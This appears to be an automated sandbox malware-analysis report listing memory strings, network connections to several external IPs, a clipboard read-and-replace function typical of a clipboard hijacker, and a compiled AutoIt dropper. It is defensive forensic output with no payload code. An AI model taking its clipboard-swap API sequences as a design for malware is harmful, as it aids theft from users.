Source: qFqSpAp.exe, 0000000E.00000003.2069781454.0000000003F98000.00000004.00000800.00020000.00000000.sdmp, qFqSpAp.exe, 0000000E.00000003.2069870204.0000000003F95000.00000004.00000800.00020000.00000000.sdmp, qFqSpAp.exe, 0000000E.00000003.2069969508.0000000003F95000.00000004.00000800.00020000.00000000.sdmp, 7aencsM.exe, 00000018.00000002.2820097256.0000000003E28000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2527177928.000078C402DA8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2521997986.000078C4026C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2523168058.000078C40281C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: chrome.exe, 00000022.00000002.2523168058.000078C40281C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.icoenterInsightsx
Source: chrome.exe, 00000022.00000002.2521638103.000078C402628000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2377675513.000078C403524000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2348313968.000078C403970000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2350542172.000078C4038DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/imghp?hl=en&tab=ri&ogbl
Source: chrome.exe, 00000022.00000002.2537312291.000078C403908000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2350542172.000078C4038DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2350301639.000078C403518000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2348852833.000078C403944000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/intl/en/about/products?tab=rh
Source: chrome.exe, 00000022.00000003.2333066892.000078C4025A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search?q=$
Source: chrome.exe, 00000022.00000003.2329293699.000078C402498000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/speech-api/v2/synthesize?
Source: chrome.exe, 00000022.00000002.2522078107.000078C4026E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/tools/feedback/chrome/__submit
Source: chrome.exe, 00000022.00000002.2526264891.000078C402C54000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/undo
Source: chrome.exe, 00000022.00000003.2333800848.000078C402494000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.comAccess-Control-Allow-Credentials:
Source: chrome.exe, 00000022.00000002.2518049276.000078C40221C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/
Source: chrome.exe, 00000022.00000002.2536078024.000078C403360000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.
Source: chrome.exe, 00000022.00000002.2536078024.000078C403360000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: chrome.exe, 00000022.00000002.2536078024.000078C403360000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.om
Source: chrome.exe, 00000022.00000002.2536078024.000078C403360000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com
Source: chrome.exe, 00000022.00000002.2522078107.000078C4026E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/chrome/intelligence/assist/ranker/models/translate/2017/03/translate_ranker_
Source: chrome.exe, 00000022.00000003.2367174021.000078C4034A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_clr_74x24px.svg
Source: chrome.exe, 00000022.00000003.2350435728.000078C4038C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2350542172.000078C4038DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/images/icons/material/system/1x/broken_image_grey600_18dp.png
Source: chrome.exe, 00000022.00000003.2349007899.000078C403268000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2350725398.000078C403998000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2537358827.000078C403914000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2350435728.000078C4038C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2350542172.000078C4038DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/images/icons/material/system/2x/broken_image_grey600_18dp.png
Source: chrome.exe, 00000022.00000002.2537312291.000078C403908000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2350542172.000078C4038DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2350301639.000078C403518000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2348852833.000078C403944000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/og/_/js/k=og.qtm.en_US.Bvq7OK2_7ZA.2019.O/rt=j/m=q_dnp
Source: chrome.exe, 00000022.00000002.2537312291.000078C403908000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2350542172.000078C4038DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2350301639.000078C403518000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000003.2348852833.000078C403944000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/og/_/ss/k=og.qtm.S4XVq7ljTQU.L.W.O/m=qmd
Source: qFqSpAp.exe, 0000000E.00000003.2118407844.0000000003FF4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
Source: qFqSpAp.exe, 0000000E.00000003.2107114932.0000000004426000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.HCe2hc5EPKfq
Source: qFqSpAp.exe, 0000000E.00000003.2107114932.0000000004426000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.oX6J3D7V9Efv
Source: qFqSpAp.exe, 0000000E.00000003.2107114932.0000000004426000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: qFqSpAp.exe, 0000000E.00000003.2107114932.0000000004426000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: qFqSpAp.exe, 0000000E.00000003.2107114932.0000000004426000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: qFqSpAp.exe, 0000000E.00000003.2107114932.0000000004426000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: chrome.exe, 00000022.00000002.2527876716.000078C402E74000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/
Source: chrome.exe, 00000022.00000003.2313802107.000078C4028D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2522926691.000078C4027BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2523590244.000078C4028E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/:
Source: chrome.exe, 00000022.00000003.2313802107.000078C4028D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2522926691.000078C4027BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2518049276.000078C40221C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2523590244.000078C4028E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2523679614.000078C4028F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2529190410.000078C402FD0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/?feature=ytca
Source: chrome.exe, 00000022.00000002.2518049276.000078C40221C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/?feature=ytcaM
Source: chrome.exe, 00000022.00000002.2523679614.000078C4028F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/?feature=ytcaogl
Source: chrome.exe, 00000022.00000003.2313802107.000078C4028D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2522926691.000078C4027BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2523590244.000078C4028E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/J
Source: chrome.exe, 00000022.00000002.2527876716.000078C402E74000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/JQ
Source: chrome.exe, 00000022.00000003.2313802107.000078C4028D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2522926691.000078C4027BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2527742967.000078C402E3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2523590244.000078C4028E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000022.00000002.2527177928.000078C402DA8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html
Source: chrome.exe, 00000022.00000002.2527177928.000078C402DA8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.htmllt

Source: unknown	Network traffic detected: HTTP traffic on port 64725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64834 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64645 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64859
Source: unknown	Network traffic detected: HTTP traffic on port 64680 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64695
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64694
Source: unknown	Network traffic detected: HTTP traffic on port 64719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64730
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64697
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64851
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64696
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64850
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64853
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64852
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64855
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64733
Source: unknown	Network traffic detected: HTTP traffic on port 64774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64694 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64852 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64686 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64867
Source: unknown	Network traffic detected: HTTP traffic on port 64683 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64860
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64862
Source: unknown	Network traffic detected: HTTP traffic on port 64697 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64846 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64689 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64832 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64662 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64647 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64851 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64859 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64757
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64638
Source: unknown	Network traffic detected: HTTP traffic on port 64675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64870
Source: unknown	Network traffic detected: HTTP traffic on port 64860 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64692 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64812 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64797 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64684 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64650 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64653 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64647
Source: unknown	Network traffic detected: HTTP traffic on port 64823 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64681 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64695 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64641
Source: unknown	Network traffic detected: HTTP traffic on port 64840 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64646
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64645
Source: unknown	Network traffic detected: HTTP traffic on port 64641 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64687 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64660
Source: unknown	Network traffic detected: HTTP traffic on port 64729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64853 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64812
Source: unknown	Network traffic detected: HTTP traffic on port 64673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64661 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64650
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64653
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64774
Source: unknown	Network traffic detected: HTTP traffic on port 64696 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64652
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64655
Source: unknown	Network traffic detected: HTTP traffic on port 64730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64862 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64847 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64701 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64669 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64638 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64790
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64671
Source: unknown	Network traffic detected: HTTP traffic on port 64709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64835 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64870 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64669
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64823
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64709
Source: unknown	Network traffic detected: HTTP traffic on port 64655 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64662
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64661
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64666
Source: unknown	Network traffic detected: HTTP traffic on port 64867 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64701
Source: unknown	Network traffic detected: HTTP traffic on port 64733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64666 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64680
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64681
Source: unknown	Network traffic detected: HTTP traffic on port 64708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64855 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64835
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64834
Source: unknown	Network traffic detected: HTTP traffic on port 64679 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64652 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64673
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64672
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64675
Source: unknown	Network traffic detected: HTTP traffic on port 64841 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64710
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64797
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64679
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64832
Source: unknown	Network traffic detected: HTTP traffic on port 64688 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64671 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64646 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64692
Source: unknown	Network traffic detected: HTTP traffic on port 64850 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64846
Source: unknown	Network traffic detected: HTTP traffic on port 64844 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64847
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64729
Source: unknown	Network traffic detected: HTTP traffic on port 64790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64684
Source: unknown	Network traffic detected: HTTP traffic on port 64660 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64683
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64686
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64840
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64688
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64687
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64841
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64723
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64844
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64689
Source: unknown	Network traffic detected: HTTP traffic on port 64731 -> 443

Source: unknown	HTTPS traffic detected: 172.67.150.155:443 -> 192.168.2.9:64638 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.150.155:443 -> 192.168.2.9:64641 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.150.155:443 -> 192.168.2.9:64645 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.150.155:443 -> 192.168.2.9:64646 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.150.155:443 -> 192.168.2.9:64647 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.150.155:443 -> 192.168.2.9:64650 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.60.59:443 -> 192.168.2.9:64652 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.150.155:443 -> 192.168.2.9:64653 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.60.59:443 -> 192.168.2.9:64655 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.150.155:443 -> 192.168.2.9:64660 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.60.59:443 -> 192.168.2.9:64661 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.60.59:443 -> 192.168.2.9:64662 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.60.59:443 -> 192.168.2.9:64666 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.60.59:443 -> 192.168.2.9:64669 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.60.59:443 -> 192.168.2.9:64671 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:64672 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.60.59:443 -> 192.168.2.9:64673 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:64675 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:64679 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:64680 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 5.75.210.149:443 -> 192.168.2.9:64681 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:64683 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:64686 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.21.16:443 -> 192.168.2.9:64687 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:64696 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:64701 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.150.155:443 -> 192.168.2.9:64757 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.150.155:443 -> 192.168.2.9:64774 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.150.155:443 -> 192.168.2.9:64790 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.150.155:443 -> 192.168.2.9:64797 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.150.155:443 -> 192.168.2.9:64812 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.150.155:443 -> 192.168.2.9:64823 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:64832 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:64834 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.150.155:443 -> 192.168.2.9:64835 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.150.155:443 -> 192.168.2.9:64840 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:64841 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.60.59:443 -> 192.168.2.9:64844 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.60.59:443 -> 192.168.2.9:64846 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:64847 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.60.59:443 -> 192.168.2.9:64850 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:64851 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.60.59:443 -> 192.168.2.9:64852 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:64853 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.60.59:443 -> 192.168.2.9:64855 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.60.59:443 -> 192.168.2.9:64859 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:64860 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.60.59:443 -> 192.168.2.9:64862 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.60.59:443 -> 192.168.2.9:64867 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:64870 version: TLS 1.2

Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe

Code function: 9_2_0043B140 OpenClipboard,GetClipboardData,GlobalLock,GetWindowRect,GlobalUnlock,CloseClipboard,

9_2_0043B140

Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe

Code function: 9_2_03AD1000 EntryPoint,GetClipboardSequenceNumber,Sleep,Sleep,OpenClipboard,GetClipboardData,GlobalLock,GlobalAlloc,GlobalLock,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,GlobalUnlock,CloseClipboard,GetClipboardSequenceNumber,

9_2_03AD1000

Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe

Code function: 9_2_0043B140 OpenClipboard,GetClipboardData,GlobalLock,GetWindowRect,GlobalUnlock,CloseClipboard,

9_2_0043B140

System Summary

Binary is likely a compiled AutoIt script file

Source: 9db7f37142.exe, 0000001B.00000002.2294508918.0000000000502000.00000002.00000001.01000000.00000011.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_65f85d70-4
Source: 9db7f37142.exe, 0000001B.00000002.2294508918.0000000000502000.00000002.00000001.01000000.00000011.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_7ec7ca76-2
Source: 9db7f37142.exe, 00000032.00000002.2471886706.0000000000502000.00000002.00000001.01000000.00000011.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_7a18bfd6-4
Source: 9db7f37142.exe, 00000032.00000002.2471886706.0000000000502000.00000002.00000001.01000000.00000011.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating 